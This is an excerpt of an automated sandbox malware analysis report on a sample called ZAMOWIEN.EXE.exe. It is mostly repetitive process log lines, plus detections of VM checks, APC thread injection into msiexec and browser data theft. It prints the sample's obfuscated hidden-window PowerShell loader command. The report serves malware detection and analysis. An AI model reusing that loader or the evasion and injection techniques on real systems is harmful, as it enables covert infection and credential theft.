Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7089			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2579			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772

Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Code function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405459
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Code function: 0_2_00405E80 FindFirstFileA,FindClose,	0_2_00405E80
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Code function: 0_2_0040264F FindFirstFileA,	0_2_0040264F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2511505619.000000000071B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

API call chain: ExitProcess graph end node

graph_0-3246

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_04BD7128 LdrInitializeThunk,

2_2_04BD7128

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Code function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EA7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3A70000

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"			Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$chippies=get-content -raw 'c:\users\user~1\appdata\local\temp\deciliteren\afstnings\rapses.arb';$notaudskrivningsdatoen=$chippies.substring(53160,3);.$notaudskrivningsdatoen($chippies)"
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$chippies=get-content -raw 'c:\users\user~1\appdata\local\temp\deciliteren\afstnings\rapses.arb';$notaudskrivningsdatoen=$chippies.substring(53160,3);.$notaudskrivningsdatoen($chippies)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
